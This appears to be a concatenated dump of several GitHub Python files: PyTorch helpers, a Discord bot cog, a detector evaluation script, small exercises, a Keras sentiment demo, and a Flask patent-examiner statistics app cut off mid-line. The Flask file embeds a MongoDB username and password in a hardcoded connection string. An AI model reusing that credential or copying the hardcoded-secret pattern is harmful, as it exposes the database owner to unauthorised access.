nn.Dropout(p2),\r\n nn.Linear(in_features=out_feat, out_features=n_classes),\r\n activation\r\n ]\r\n return nn.Sequential(*layers)\r\n\r\nclass PCA(nn.Module):\r\n def __init__(self, pca_model, scaler_model=None):\r\n super(PCA, self).__init__()\r\n \r\n if scaler_model is not None:\r\n self.has_scale = True\r\n self.scale = nn.Parameter(torch.from_numpy(scaler_model.scale_).type(torch.FloatTensor))\r\n self.scale_mean = nn.Parameter(torch.from_numpy(scaler_model.mean_).type(torch.FloatTensor))\r\n else:\r\n self.has_scale = False\r\n \r\n if pca_model.mean_ is None:\r\n self.mean = nn.Parameter(torch.zeros(1))\r\n else:\r\n self.mean = nn.Parameter(torch.from_numpy(pca_model.mean_).type(torch.FloatTensor))\r\n self.components = nn.Parameter(torch.from_numpy(pca_model.components_).t().type(torch.FloatTensor))\r\n self.whiten = pca_model.whiten\r\n self.explained_variance = nn.Parameter(torch.from_numpy(pca_model.explained_variance_).type(torch.FloatTensor))\r\n\r\n self.n_components = pca_model.n_components_\r\n self.noise_variance = pca_model.noise_variance_\r\n self.singular_values = torch.from_numpy(pca_model.singular_values_).type(torch.FloatTensor)\r\n self.explained_variance_ratio = torch.from_numpy(pca_model.explained_variance_ratio_).type(torch.FloatTensor)\r\n \r\n def forward(self, x):\r\n if self.has_scale:\r\n x = x - self.scale_mean\r\n x = x / self.scale\r\n \r\n if self.mean is not None:\r\n x = x - self.mean\r\n \r\n x_transformed = torch.mm(x, self.components)\r\n \r\n if self.whiten:\r\n x_transformed = x_transformed / torch.sqrt(self.explained_variance) \r\n \r\n return x_transformed\r\n\r\n\r\n\r\ndef save_net(fname, net):\r\n import h5py\r\n h5f = h5py.File(fname, mode='w')\r\n for k, v in net.state_dict().items():\r\n h5f.create_dataset(k, data=v.cpu().numpy())\r\n\r\ndef load_net(fname, net):\r\n import h5py\r\n h5f = h5py.File(fname, mode='r')\r\n for k, v in net.state_dict().items():\r\n param = torch.from_numpy(np.asarray(h5f[k]))\r\n v.copy_(param)\r\n\r\ndef weights_normal_init(model, dev=0.01):\r\n if isinstance(model, list):\r\n for m in model:\r\n weights_normal_init(m, dev)\r\n else:\r\n for m in model.modules():\r\n if isinstance(m, nn.Conv2d):\r\n m.weight.data.normal_(0.0, dev)\r\n elif 
isinstance(m, nn.Linear):\r\n m.weight.data.normal_(0.0, dev)\r\n\r\n\r\ndef save_chkpt(model, chkpt_num, model_dir):\r\n\r\n # Save model\r\n chkpt_fname = os.path.join(model_dir, \"model{}.chkpt\".format(chkpt_num))\r\n torch.save(model.state_dict(), chkpt_fname)\r\n\r\ndef save_checkpoint(state, filename):\r\n directory = os.path.dirname(filename)\r\n if not os.path.exists(directory):\r\n os.makedirs(directory)\r\n torch.save(state, filename)\r\n print('Saved model state dict at %s.' % filename)\r\n\r\n\r\n\r\ndef load_network_from_chkpt(model, chkpt_num, model_dir):\r\n\r\n chkpt_fname = os.path.join(model_dir, \"model{}.chkpt\".format(chkpt_num))\r\n model.load_state_dict(torch.load(chkpt_fname))\r\n\r\n return model\r\n\r\ndef load_model(fpath, cuda=True):\r\n if cuda:\r\n return torch.load(fpath).cuda()\r\n return torch.load(fpath)\r\n\r\n\r\ndef save_model(model, fpath):\r\n torch.save(model.cpu(), fpath)\r\n\r\n\r\ndef load_weights_from_source(target, source_state): #未调试\r\n new_dict = OrderedDict()\r\n for k, v in target.state_dict().items():\r\n if k in source_state and v.size() == source_state[k].size():\r\n new_dict[k] = source_state[k]\r\n else:\r\n new_dict[k] = v\r\n target.load_state_dict(new_dict)\r\n\r\ndef load_weights(model, fpath):\r\n state = torch.load(fpath)\r\n model.load_state_dict(state['state_dict'])\r\n\r\n\r\ndef save_weights(model, fpath, epoch=None, name=None):\r\n torch.save({\r\n 'name': name,\r\n 'epoch': epoch,\r\n 'state_dict': model.state_dict()\r\n }, fpath)\r\n\r\n\r\ndef freeze_layers(model, n_layers):\r\n i = 0\r\n for child in model.children():\r\n if i >= n_layers:\r\n break\r\n print(i, \"freezing\", child)\r\n for param in child.parameters():\r\n param.requires_grad = False\r\n i += 1\r\n\r\n\r\ndef freeze_nested_layers(model, n_layers):\r\n i = 0\r\n for child in model.children():\r\n for grandchild in child.children():\r\n if isinstance(grandchild, torch.nn.modules.container.Sequential):\r\n for greatgrand in grandchild.children():\r\n if i >= n_layers:\r\n break\r\n for param in greatgrand.parameters():\r\n param.requires_grad = False\r\n print(i, \"freezing\", greatgrand)\r\n i += 1\r\n else:\r\n if i >= n_layers:\r\n break\r\n for param in grandchild.parameters():\r\n param.requires_grad = False\r\n print(i, \"freezing\", grandchild)\r\n i += 1\r\n\r\n\r\ndef init_nested_layers(module, init_func):\r\n for child in module.children():\r\n if len(list(child.children())) > 0:\r\n init_nested_layers(child, init_func)\r\n else:\r\n init_weights(child, init_func)\r\n\r\n\r\n\r\n\r\ndef init_weights(module,init_func):\r\n for m in module.modules():\r\n if isinstance(m, nn.Conv2d) or isinstance(m, nn.Linear):\r\n print(\"initializing \", m, \" with xavier init\")\r\n init_func(m.weight)\r\n if hasattr(m, 'bias') and m.bias is not None:\r\n print(\"initial bias from \", m, \" with zeros\")\r\n nn.init.constant(m.bias, 0.0)\r\n elif isinstance(m, nn.Sequential):\r\n for mod in m:\r\n init_weights(mod,init_func)\r\n\r\n return module\r\n\r\n\r\ndef cut_model(model, cut):\r\n return nn.Sequential(*list(model.children())[:cut])\r\n\r\ndef get_requires_grad_params(model):\r\n \r\n model_params = filter(lambda p: p.requires_grad, model.parameters()) \r\n return model_params\r\n\r\n\r\ndef create_criterion(**criterion_params):\r\n criterion_name = criterion_params.pop('criterion', None)\r\n if criterion_name is None:\r\n return None\r\n criterion = nn.__dict__[criterion_name](**criterion_params)\r\n if torch.cuda.is_available():\r\n criterion = 
criterion.cuda()\r\n return criterion\r\n\r\n\r\ndef create_optimizer(model, **optimizer_params):\r\n optimizer_name = optimizer_params.pop('optimizer', None)\r\n if optimizer_name is None:\r\n return None\r\n optimizer = torch.optim.__dict__[optimizer_name](\r\n filter(lambda p: p.requires_grad, model.parameters()),\r\n **optimizer_params)\r\n return optimizer\r\n\r\ndef load_sub_modules_from_pretrained(pretraind_sub_modules_list,model_sub_modules_list):\r\n for p,m in zip(pretraind_sub_modules_list,model_sub_modules_list):\r\n for param_p,param_m in zip(p.parameters(),m.parameters()):\r\n assert_equal(param_p.size(),param_m.size())\r\n m.load_state_dict(p.state_dict())\r\n\r\ndef clip_gradient(model, clip_norm):\r\n \"\"\"Computes a gradient clipping coefficient based on gradient norm.\"\"\"\r\n totalnorm = 0\r\n for p in model.parameters():\r\n if p.requires_grad:\r\n modulenorm = p.grad.data.norm()\r\n totalnorm += modulenorm ** 2\r\n totalnorm = np.sqrt(totalnorm)\r\n\r\n norm = clip_norm / max(totalnorm, clip_norm)\r\n for p in model.parameters():\r\n if p.requires_grad:\r\n p.grad.mul_(norm)\r\n\r\n#def clip_gradient(optimizer, grad_clip):\r\n# for group in optimizer.param_groups:\r\n# for param in group['params']:\r\n# param.grad.data.clamp_(-grad_clip, grad_clip)\r\n\r\n#def clip_gradient(optimizer, max_norm, norm_type=2):\r\n# max_norm = float(max_norm)\r\n# if norm_type == float('inf'):\r\n# total_norm = max(p.grad.data.abs().max() for group in optimizer.param_groups for p in group['params'])\r\n# else:\r\n# total_norm = 0.0\r\n# for group in optimizer.param_groups:\r\n# for p in group['params']:\r\n# try:\r\n# param_norm = p.grad.data.norm(norm_type)\r\n# nn = param_norm ** norm_type\r\n# # print('norm:', nn, p.grad.size())\r\n# total_norm += nn\r\n# param_norm ** norm_type\r\n# except:\r\n# pass\r\n# total_norm = total_norm ** (1. / norm_type)\r\n# clip_coef = max_norm / (total_norm + 1e-6)\r\n# if clip_coef < 1:\r\n# for group in optimizer.param_groups:\r\n# for p in group['params']:\r\n# try:\r\n# p.grad.data.mul_(clip_coef)\r\n# except:\r\n# pass\r\n# return total_norm\r\n\r\ndef moving_average(net1, net2, alpha=1):\r\n for param1, param2 in zip(net1.parameters(), net2.parameters()):\r\n param1.data *= (1.0 - alpha)\r\n param1.data += param2.data * alpha\r\n\r\ndef average_checkpoints(inputs): #权值平均\r\n \"\"\"Loads checkpoints from inputs and returns a model with averaged weights.\r\n Args:\r\n inputs: An iterable of string paths of checkpoints to load from.\r\n Returns:\r\n A dict of string keys mapping to various values. 
The 'model' key\r\n from the returned dict should correspond to an OrderedDict mapping\r\n string parameter names to torch Tensors.\r\n \"\"\"\r\n params_dict = collections.OrderedDict()\r\n params_keys = None\r\n new_state = None\r\n for f in inputs:\r\n state = torch.load(\r\n f,\r\n map_location=(\r\n lambda s, _: torch.serialization.default_restore_location(s, 'cpu')\r\n ),\r\n )\r\n # Copies over the settings from the first checkpoint\r\n if new_state is None:\r\n new_state = state\r\n\r\n model_params = state['model'] #注意model关键字key\r\n\r\n model_params_keys = list(model_params.keys())\r\n if params_keys is None:\r\n params_keys = model_params_keys\r\n elif params_keys != model_params_keys:\r\n raise KeyError(\r\n 'For checkpoint {}, expected list of params: {}, '\r\n 'but found: {}'.format(f, params_keys, model_params_keys)\r\n )\r\n\r\n for k in params_keys:\r\n if k not in params_dict:\r\n params_dict[k] = []\r\n params_dict[k].append(model_params[k])\r\n\r\n averaged_params = collections.OrderedDict()\r\n # v should be a list of torch Tensor.\r\n for k, v in params_dict.items():\r\n summed_v = None\r\n for x in v:\r\n summed_v = summed_v + x if summed_v is not None else x\r\n averaged_params[k] = summed_v / len(v)\r\n new_state['model'] = averaged_params\r\n return new_state\r\n\r\n\r\n\r\n\r\n","repo_name":"dsp6414/Pytorch-Lib","sub_path":"net_utils/net_utils.py","file_name":"net_utils.py","file_ext":"py","file_size_in_byte":16865,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"70648013168","text":"import core\nimport discord\nfrom util import paginators\n\n\nclass Config(core.Cog):\n\n @core.group(\n name=\"shortcuts\",\n aliases=(\"sc\", \"shortcut\"),\n cooldown=(3, 2),\n description=\"View or modify your current shortcuts.\",\n usage=\"[ add | remove | clear | search ]\",\n invoke_without_command=True\n )\n async def _shortcuts(self, ctx):\n shortcuts = await ctx.db.fetch(\"SELECT * FROM shortcuts WHERE user_id=$1\", ctx.author.id)\n fields = ([{\n \"name\": shortcut[\"name\"],\n \"value\": shortcut[\"command\"][:1024],\n \"inline\": False\n } for shortcut in shortcuts] if len(shortcuts)>0 else [{\n \"name\": \"No shortcuts!\",\n \"value\": f\"To create a shortcut, use `{ctx.clean_prefix}shortcuts add`\"\n }])\n\n _embed = discord.Embed(color=core.COLOR, timestamp=ctx.now)\n _embed.set_author(name=f\"{ctx.author.name}'s Shortcuts\", icon_url=ctx.avatar)\n _embed.description = f\"{len(shortcuts)}/{core.MAX_SHORTCUTS} shortcuts\"\n await paginators.field_paginate(ctx, _embed, fields, footer=\"Page {page}\")\n\n\n @_shortcuts.command(\n name=\"add\",\n aliases=(\"make\", \"create\", \"+\"),\n cooldown=(2, 1),\n description=\"Create a new shortcut.\",\n usage=\" \",\n examples=(\n \"shortcuts add coffee buy coffee --use-after\",\n \"shortcuts add \\\"some shortcut\\\" shop amogus --no-reply\"\n )\n )\n async def _shortcuts_add(self, ctx, shortcut, *, command):\n if len(shortcut) > 64:\n return await ctx.send(\"Length of shortcut must be under 64 characters.\")\n shortcut = shortcut.strip().lower()\n if len(shortcut) < 1:\n return await ctx.send(\"Shortcut name is required.\")\n if ctx.bot.get_command(shortcut):\n return await ctx.send(\"Shortcut name must not be the name of an existing command.\")\n shortcuts = ctx.db.shortcut_cache.get(ctx.author.id, [])\n if len(shortcuts) >= core.MAX_SHORTCUTS:\n return await ctx.send(f\"You can only have up to **{core.MAX_SHORTCUTS:,}** shortcuts.\")\n if any(sc[\"name\"] == 
shortcut for sc in shortcuts):\n return await ctx.send(\"A shortcut with that name already exists.\")\n\n await ctx.db.add_shortcut(ctx.author, shortcut, command)\n await ctx.send(f\"Shortcut `{shortcut}` created.\")\n\n\n @core.group(\n name=\"prefix\",\n aliases=(\"pr\", \"prefixes\"),\n cooldown=(0.5, 0.2),\n brief=\"View or modify prefixes.\",\n description=(\n \"View and/or modify your server's prefixes. \"\n \"You can have up to 20 prefixes at once.\"\n ),\n usage=\"prefix [add|remove|clear|set] [prefixes]\",\n examples=(\n \"prefix\",\n \"prefix add !\",\n \"prefix add \\\"hey, \\\"\",\n \"prefix add ! ? -\",\n \"prefix remove !\",\n \"prefix remove \\\"hey, \\\"\",\n \"prefix clear\"\n ),\n bot_perms=(\"Send Messages\", \"Embed Links\"),\n invoke_without_command=True\n )\n @core.check(bot_perms=('send_messages', 'embed_links'))\n async def _prefix(self, ctx):\n\n await ctx.cd()\n _prefixes = await ctx.bot.db.get(\"guilds\", ctx.guild, \"prefixes\")\n embed = discord.Embed(\n color=core.COLOR,\n timestamp=ctx.now,\n title=f\"{len(_prefixes)} prefix{'es' if len(_prefixes)!=1 else ''}\",\n description=\"\\n\".join(_prefixes)\n )\n await ctx.send(embed)\n\n @_prefix.command(\n name=\"add\",\n aliases=(\"create\", \"make\", \"a\", \"+\"),\n cooldown=(1, 0.5),\n brief=\"Add prefixes.\",\n description=(\n \"Add prefixes to your server. \"\n \"You can add multiple prefixes at once by seperating them by space, \"\n \"and if your prefix has a space, surround it in quotes.\"\n ),\n usage=\"prefix add <...prefixes>\",\n examples=(\n \"prefix add !\",\n \"prefix add ! ? -\",\n \"prefix add \\\"hey, \\\"\",\n \"prefix add \\\"hey, \\\" ! ?\"\n ),\n perms=\"Server Administrator\"\n )\n @core.check(perms=(\"administrator\",))\n async def _prefix_add(self, ctx, *prefixes):\n await ctx.cd()\n if len(prefixes) <= 0:\n return await ctx.send(\"Please give me prefixes to add.\")\n\n _prefixes = await ctx.bot.db.get(\"guilds\", ctx.guild, \"prefixes\")\n if len(prefixes) + len(_prefixes) > 20:\n return await ctx.send(\"You can only have a maximum of 20 prefixes.\")\n\n if any(len(pf) > 32 for pf in prefixes):\n return await ctx.send(\"Lengths of prefixes must be under 32 characters.\")\n\n _new = [*prefixes, *_prefixes]\n await ctx.bot.db.set(\"guilds\", \"prefixes\", ctx.guild, _new)\n await ctx.send(f\"Successfully added {len(prefixes)} prefix{'es' if len(prefixes)!=1 else ''}\")\n\n\ndef setup(client):\n cog = Config(client)\n client.add_cog(cog)\n","repo_name":"jay3332/ShrimpMaster","sub_path":"cogs/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":5053,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"2"} +{"seq_id":"25267813197","text":"__author__ = \"Alexey Antonenko, vedrusss@gmail.com\"\n\nimport argparse\nimport os\nimport json\nimport cv2\nimport numpy as np\nfrom collections import defaultdict\nfrom detect import Detector\nfrom detect_recognize import DigitsDetector\n\nbase_name = lambda path: '.'.join(os.path.split(path)[-1].split('.')[:-1])\nscan_files = lambda folder: {base_name(name): os.path.join(folder, name)\n for name in os.listdir(folder) if os.path.isfile(os.path.join(folder, name))}\n\ndef compare(detections, gt_objects):\n TPs, FNs = defaultdict(int), defaultdict(int)\n for obj in gt_objects:\n label, ltrb = obj['label'], obj['box']\n boxes = [d['box'] for d in detections if d['label'] is None or d['label'] == label]\n if has_intersection(ltrb, boxes):\n TPs[label] += 1\n else:\n FNs[label] += 1\n FPs = 
defaultdict(int)\n for d in detections:\n label, box = d['label'], d['box']\n gt_boxes = [obj['box'] for obj in gt_objects if label is None or obj['label'] == label]\n if label is None:\n label = 'none'\n if not has_intersection(box, gt_boxes):\n FPs[label] += 1\n return TPs, FNs, FPs\n\ndef evaluate_detector(detector, test_data, and_recognizer=False, stop=None):\n all_TPs, all_FNs, all_FPs = defaultdict(int), defaultdict(int), defaultdict(int)\n i = 0\n for im_path, ann_path in test_data:\n image = cv2.imread(im_path)\n assert(image is not None), f\"Cannot read {im_path}\"\n objects = parse_annotation(ann_path)\n detections = detector(image)\n if not and_recognizer:\n detections = [{'box':b, 'label':None, 'score':None} for b in detections]\n TPs, FNs, FPs = compare(detections, objects)\n for label in TPs.keys():\n all_TPs[label] += TPs[label]\n all_FNs[label] += FNs[label]\n for label in FPs.keys():\n all_FPs[label] += FPs[label]\n i += 1\n if stop and i > stop: break\n \n pres, recs, f1ss = defaultdict(int), defaultdict(int), defaultdict(int)\n for label, fps in all_FPs.items():\n tps = all_TPs[label] if label in all_TPs else sum(all_TPs.values())\n fns = all_FNs[label] if label in all_FNs else sum(all_FNs.values())\n detections_amount = tps + fps\n gt_objects_amount = tps + fns\n pres[label], recs[label], f1ss[label] = pre_rec_f1s(tps, fns, fps)\n tps = sum(all_TPs.values())\n fns = sum(all_FNs.values())\n fps = sum(all_FPs.values())\n i_pre, i_rec, i_f1s = pre_rec_f1s(tps, fns, fps)\n stats = {}\n stats['per_label'] = (pres, recs, f1ss)\n stats['integral'] = (i_pre, i_rec, i_f1s)\n results = (all_TPs, all_FNs, all_FPs)\n return stats, results\n\ndef pre_rec_f1s(tps, fns, fps):\n all_dets = tps + fps\n gt_positives = tps + fns\n pre = tps / float(all_dets) if all_dets > 0 else None\n rec = tps / float(gt_positives) if gt_positives > 0 else None\n f1s = 2. 
* pre * rec / (pre + rec) if pre and rec else None\n return pre, rec, f1s\n\ndef has_intersection(box, boxes, iou_threhold=0.6):\n for b in boxes:\n IoU = iou(box, b)\n #print(box, b, IoU, iou_threhold)\n if IoU >= iou_threhold:\n return True\n return False\n\ndef iou(b1, b2):\n l, t = max(b1[0], b2[0]), max(b1[1], b2[1])\n r, b = min(b1[2], b2[2]), min(b1[3], b2[3])\n if l >= r or t >= b: \n return 0.0 # no intersection at all\n interArea = max(0, r-l+1) * max(0, b-t+1)\n b1Area = (b1[2] - b1[0] + 1) * (b1[3] - b1[1] + 1)\n b2Area = (b2[2] - b2[0] + 1) * (b2[3] - b2[1] + 1)\n return interArea / float(b1Area + b2Area - interArea)\n\n\ndef parse_annotation(filepath):\n d = json.load(open(filepath))\n return d.get('objects', [])\n\ndef parse_args():\n parser = argparse.ArgumentParser(\"Tool to create data for digits detector\")\n parser.add_argument('-i', '--images', type=str, required=True, \n help='Folders with digit images')\n parser.add_argument('-a', '--annotations', type=str, required=True, \n help='Folder annotations')\n parser.add_argument('-dm','--detector_models', type=str, nargs='+',\n help='Detector model file(-s)')\n parser.add_argument('-cm','--classifier_model', type=str, default=None,\n help=\"Specify classifier model to evaluate the whole pipeline\")\n parser.add_argument('-o', '--output', type=str, default=None,\n help=\"Where to store montages for analysis\")\n return parser.parse_args()\n\ndef main(args):\n image_files = scan_files(args.images)\n annotations = scan_files(args.annotations)\n test_data = [[im_path, annotations[name]] for name, im_path in image_files.items() if name in annotations]\n \n opencv_model = False # args.detector_models.endswith('.xml')\n stop = None\n if args.classifier_model:\n detector = DigitsDetector(args.detector_models, args.classifier_model)\n stats, results = evaluate_detector(detector, test_data, True, stop)\n else:\n detector = Detector(args.detector_models, opencv_model, resize_factor=2.)\n stats, results = evaluate_detector(detector, test_data, False, stop)\n # print stats\n print(\"--- 'per_label' ---\")\n metrics = stats['per_label']\n for label in metrics[0].keys():\n print(f\"{label}\\tprecision: {round(metrics[0][label],3)}, recall: {round(metrics[1][label],3)}, f1 score: {round(metrics[2][label],3)}\")\n print(\"--- 'integral' ---\")\n metrics = stats['integral']\n print(f\"precision: {round(metrics[0],3)}, recall: {round(metrics[1],3)}, f1 score: {round(metrics[2],3)}\")\n\nif __name__ == \"__main__\":\n main(parse_args())\n","repo_name":"vedrusss/digits-detection-recognition","sub_path":"eval_detector.py","file_name":"eval_detector.py","file_ext":"py","file_size_in_byte":5708,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"4614673858","text":"def best_sum(targ, nums, memo = {}):\n \n if targ in memo:\n return memo[targ]\n # base cases:\n if targ == 0:\n return []\n # targ < 0: clear history\n if targ < 0:\n return None\n \n best = None\n # recursive case:\n # loop through nums\n for n in nums:\n if n == 0:\n continue\n new_targ = targ - n\n new_result = best_sum(new_targ, nums)\n if new_result != None and (best == None or len(best) > len(new_result)):\n best = new_result + [n]\n \n # subtract num from targ (and add it to history)\n # call how sum on new targ and history\n memo[targ] = best\n return best\n\nnums = [2,5]\ntarg = 8\nprint (best_sum(targ, 
nums))","repo_name":"eee-vvv/algorithm-practice","sub_path":"dynamic_programming/best_sum.py","file_name":"best_sum.py","file_ext":"py","file_size_in_byte":729,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"36275193674","text":"def computepay(hours,rate):\n\tif hours > 40:\n\t\tregpay = hours * float(rate)\n\t\tovertime = (0.5 * float(rate)) * (hours - 40)\n\t\tpay = regpay + overtime\n\t\n\telse:\n\t\tpay = hours * float(rate)\n\n\tprint(pay)\ntry:\n\t\thours = int(input('Enter Hours'))\n\t\trate = input('Enter Pay')\nexcept:\n\t\tprint(\"Error, Please Enter Numeric Input\")\nelse:\n\t\t# Only compute the pay when both inputs were read successfully;\n\t\t# calling computepay after a failed parse raised a NameError before.\n\t\tcomputepay(hours, rate)","repo_name":"agonzalezcurci/class-work","sub_path":"pay3.py","file_name":"pay3.py","file_ext":"py","file_size_in_byte":347,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"2072855109","text":"# Predict whether a movie review is positive or negative\n\nimport numpy as np\nimport tensorflow as tf\nfrom numpy import array\nfrom keras.preprocessing.text import Tokenizer\nfrom keras.preprocessing.sequence import pad_sequences\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Flatten, Embedding\n\n# Define the text review data\ndocs = ['너무 재밌어요', '최고에요', '참 잘 만든 영화에요', '추천하고 싶은 영화입니다', '한 번 더 보고 싶네요',\n '글쎄요', '별로에요', '생각보다 지루해요', '연기가 어색해요', '재미없어요', '너무 재미없다', '참 재밌네요']\n\n# Label positive reviews as 1 and negative reviews as 0\nclasses = array([1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0])\n\n# Tokenization\ntoken = Tokenizer()\ntoken.fit_on_texts(docs)\nprint(token.word_index)\n\n# Build new sequences from the indices assigned to each token\nx = token.texts_to_sequences(docs)\n\n# Pad the variable-length sequences to a fixed length of 4\npadded_x = pad_sequences(x, 4)\nprint(\"\\nPadding result:\\n\", padded_x)\n\n# Vocabulary size fed into the embedding layer\nword_size = len(token.word_index) + 1\n\n# Build the model with a word embedding layer and report the accuracy\nmodel = Sequential()\nmodel.add(Embedding(word_size, 8, input_length=4))\nmodel.add(Flatten())\nmodel.add(Dense(1, activation='sigmoid'))\nmodel.compile(optimizer='adam', loss='binary_crossentropy', metrics=['accuracy'])\nmodel.fit(padded_x, classes, epochs=20)\n\nprint(\"\\n Accuracy: %.4f\" % (model.evaluate(padded_x, classes)[1]))\n\n# Epoch 20/20\n# 1/1 [==============================] - 0s 3ms/step - loss: 0.6394 - accuracy: 0.8333\n# 1/1 [==============================] - 0s 72ms/step - loss: 0.6370 - accuracy: 0.8333\n# \n# Accuracy: 0.8333\n","repo_name":"nikel4610/Machine_Learning_forStudy","sub_path":"02_More_Deeplearning/03_Basic_NLP.py","file_name":"03_Basic_NLP.py","file_ext":"py","file_size_in_byte":1775,"program_lang":"python","lang":"ko","doc_type":"code","stars":2,"dataset":"github-code","pt":"2"} +{"seq_id":"24242939520","text":"\r\n# A very simple Flask Hello World app for you to get started with...\r\ndef get_month_text (number):\r\n\r\n if number==1:\r\n return \"January\"\r\n if number==2:\r\n return \"February\"\r\n if number==3:\r\n return \"March\"\r\n if number==4:\r\n return \"April\"\r\n if number==5:\r\n return \"May\"\r\n if number==6:\r\n return \"June\"\r\n if number==7:\r\n return \"July\"\r\n if number==8:\r\n return \"August\"\r\n if number==9:\r\n return \"September\"\r\n if number==10:\r\n return \"October\"\r\n if number==11:\r\n return \"November\"\r\n if number==12:\r\n return \"December\"\r\n\r\nfrom flask import Flask\r\nfrom flask import jsonify\r\nimport datetime\r\nfrom datetime import date, timedelta\r\nimport matplotlib\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\nimport pprint\r\nfrom pprint import pprint\r\nimport json\r\nimport pymongo\r\nfrom 
decimal import *\r\nfrom flask import request\r\nfrom flask_caching import Cache\r\nfrom email.mime.multipart import MIMEMultipart\r\nfrom flask import Flask, render_template, request, jsonify\r\n\r\nmatplotlib.use('agg')\r\nconfig = {\r\n \"DEBUG\": True, # some Flask specific configs\r\n \"CACHE_TYPE\": \"simple\", # Flask-Caching related configs\r\n \"CACHE_DEFAULT_TIMEOUT\": 300\r\n}\r\napp = Flask(__name__)\r\napp.config.from_mapping(config)\r\ncache = Cache(app)\r\nfrom flask_cors import CORS, cross_origin\r\ncors = CORS(app)\r\napp.config['CORS_HEADERS'] = 'Content-Type'\r\n@app.route('/')\r\n@app.route('/data')\r\ndef get_examiner():\r\n ## Initializing the mongo connection\r\n examiner_name = request.args['name']\r\n return jsonify(hello_world(examiner_name))\r\n\r\n# index route, shows index.html view\r\n@app.route('/application')\r\ndef index():\r\n return render_template('index.html')\r\n\r\ndef hello_world(examiner_name):\r\n ## Initializing the mongo connection\r\n connection_string = 'mongodb+srv://Zeevtest:Zeevtest@freship-fu97s.mongodb.net/test?retryWrites=true&w=majority'\r\n from bson.decimal128 import Decimal128\r\n from bson.codec_options import TypeCodec\r\n class DecimalCodec(TypeCodec):\r\n python_type = Decimal # the Python type acted upon by this type codec\r\n bson_type = Decimal128 # the BSON type acted upon by this type codec\r\n def transform_python(self, value):\r\n \"\"\"Function that transforms a custom type value into a type\r\n that BSON can encode.\"\"\"\r\n return Decimal128(value)\r\n def transform_bson(self, value):\r\n \"\"\"Function that transforms a vanilla BSON type value into our\r\n custom type.\"\"\"\r\n return value.to_decimal()\r\n decimal_codec = DecimalCodec()\r\n\r\n today = date.today()\r\n cutoff_date = today - timedelta(days=70)\r\n\r\n from bson.codec_options import TypeRegistry\r\n type_registry = TypeRegistry([decimal_codec])\r\n from bson.codec_options import CodecOptions\r\n codec_options = CodecOptions(type_registry=type_registry)\r\n\r\n mongo_client = pymongo.MongoClient(connection_string)\r\n mydb = mongo_client[\"patents\"]\r\n db = mongo_client[\"patents\"]\r\n examiners_collection = mydb.get_collection(\"examiners_new\" , codec_options=codec_options)\r\n\r\n print(examiner_name)\r\n examiner_record = examiners_collection.find_one({'examiner':examiner_name})\r\n\r\n if examiner_record is None:\r\n print (\"no examiner record\")\r\n\r\n else:\r\n if \"total_refused\" in examiner_record:\r\n examiner_apps_refused = examiner_record.get(\"total_refused\")\r\n else:\r\n examiner_apps_refused = 0\r\n if \"total_refused_with_interview\" in examiner_record:\r\n examiner_apps_refused_with_interview = examiner_record.get(\"total_refused_with_interview\")\r\n else:\r\n examiner_apps_refused_with_interview = 0\r\n if \"total_refused_without_interview\" in examiner_record:\r\n examiner_apps_refused_without_interview = examiner_record.get(\"total_refused_without_interview\")\r\n else:\r\n examiner_apps_refused_without_interview = 0\r\n\r\n if \"total_granted\" in examiner_record:\r\n examiner_apps_granted = examiner_record.get(\"total_granted\")\r\n else:\r\n examiner_apps_granted = 0\r\n if \"total_granted_with_interview\" in examiner_record:\r\n examiner_apps_granted_with_interview = examiner_record.get(\"total_granted_with_interview\")\r\n else:\r\n examiner_apps_granted_with_interview = 0\r\n if \"total_granted_without_interview\" in examiner_record:\r\n examiner_apps_granted_without_interview = 
examiner_record.get(\"total_granted_without_interview\")\r\n else:\r\n examiner_apps_granted_without_interview = 0\r\n\r\n examiner_apps_we_have = examiner_apps_granted + examiner_apps_refused\r\n examiner_grant_rate = \"%.0f%%\" % (100 * examiner_apps_granted / examiner_apps_we_have)\r\n examiner_grant_rate_with_interview = \"%.0f%%\" % (100 * examiner_apps_granted_with_interview / (examiner_apps_granted_with_interview + examiner_apps_refused_with_interview))\r\n examiner_grant_rate_without_interview = \"%.0f%%\" % (100 * examiner_apps_granted_without_interview / (examiner_apps_granted_without_interview + examiner_apps_refused_without_interview))\r\n interview_improvement_rate = \"%.0f%%\" % (100 * (examiner_apps_granted_with_interview / (examiner_apps_granted_with_interview + examiner_apps_refused_with_interview)) / (examiner_apps_granted_without_interview / (examiner_apps_granted_without_interview + examiner_apps_refused_without_interview))-100)\r\n\r\n # Here comes the monthly data:\r\n successful_month_retrieved = examiner_record.get(\"successful_month\")\r\n failed_month_retrieved = examiner_record.get(\"failed_month\")\r\n successful_month = []\r\n failed_month = []\r\n month_stat = []\r\n #possible_response_month = []\r\n total_successful_responses = 0\r\n total_failed_responses = 0\r\n\r\n for i in range (1,14):\r\n successful_month.append(0)\r\n failed_month.append(0)\r\n month_stat.append(0)\r\n #possible_response_month.append(0)\r\n\r\n try:\r\n for key,value in successful_month_retrieved.items():\r\n key = int(key)\r\n successful_month[key] = value\r\n total_successful_responses = total_successful_responses + value\r\n except AttributeError:\r\n print (\"no successful month data\")\r\n total_successful_responses = 0.00000000000000000000000001\r\n try:\r\n for key,value in failed_month_retrieved.items():\r\n key = int(key)\r\n failed_month[key] = value\r\n total_failed_responses = total_failed_responses + value\r\n except AttributeError:\r\n print (\"no failed month data\")\r\n\r\n #print (\"monthly statistics, month by month\")\r\n for i in range (0,13):\r\n if (failed_month[i] !=0):\r\n month_stat[i] = successful_month[i] / (successful_month[i] + failed_month [i])\r\n #month_stat[i] = \"%.0f%%\" % (100 * month_stat[i])\r\n #if (i !=0):\r\n #print (\"Month\",str(i),\": \",month_stat[i], \" \")\r\n\r\n response_success_rate = total_successful_responses / ( total_successful_responses + total_failed_responses)\r\n\r\n # Run through the 6 months including and after the one where the office action was issued:\r\n recommended_month_stat = 0\r\n\r\n recommended_month_stat = \"%.0f%%\" % (100 * 